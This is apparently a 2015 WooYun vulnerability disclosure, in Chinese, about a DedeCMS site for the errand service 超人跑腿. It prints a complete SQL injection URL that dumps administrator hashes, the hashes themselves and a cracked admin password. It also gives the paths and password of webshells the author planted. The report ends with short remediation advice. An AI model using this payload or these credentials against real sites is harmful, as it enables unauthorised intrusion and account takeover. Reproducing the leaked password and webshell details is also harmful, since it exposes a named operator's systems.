当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0152827

漏洞标题:超人跑腿主站SQL注入可shell(已进后台)

相关厂商:超人跑腿

漏洞作者: system-admin

提交时间:2015-11-10 13:46

修复时间:2015-12-25 13:48

公开时间:2015-12-25 13:48

漏洞类型:SQL注射漏洞

危害等级:低

自评Rank:1

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-11-10: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-12-25: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

下楼时在楼下遇到“超人跑腿”一快递员并递给我一个宣传卡片,卡片上有个网址www.chaorenpaotui.cn,回家看了下是dedecms站,用一个都知道的注入并拿webshell,并发现这台服务器没有对各个站点的目录做访问限制

详细说明:

http://www.chaorenpaotui.cn/plus/recommend.php?aid=1&_FILES[type][name]&_FILES[type][size]&_FILES[type][type]&_FILES[type][tmp_name]=aa\%27and+char%28@%60%27%60%29+/*!50000Union*/+/*!50000SeLect*/+1,2,3,concat%280x3C6162633E,group_concat%280x7C,userid,0x3a,pwd,0x7C%29,0x3C2F6162633E%29,5,6,7,8,9%20from%20%60%23@__admin%60%23";
得到网站管理员账户
admin:7c6ff7a20019e54878e0
chaorenpaotui:3a5fdc8a052a2441e51e
解出账户admin密码1478963258,登入默认后台通过

QQ截图20151108185944.png


通过自带的文件管理器新建webshell,地址http://www.chaorenpaotui.cn/uploads/allimg/131111/1-131111202436464.php,密码chaoren

QQ截图20151108190226.png


可以查看同服务器其它站点的目录
没能拿到服务器权限

漏洞证明:

webshell: http://www.chaorenpaotui.cn/wooyun.php

修复方案:

超人跑腿:后台有提示,按提示改就可以了
服务器管理员:设一下目录访问权限

版权声明:转载请注明来源 system-admin@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝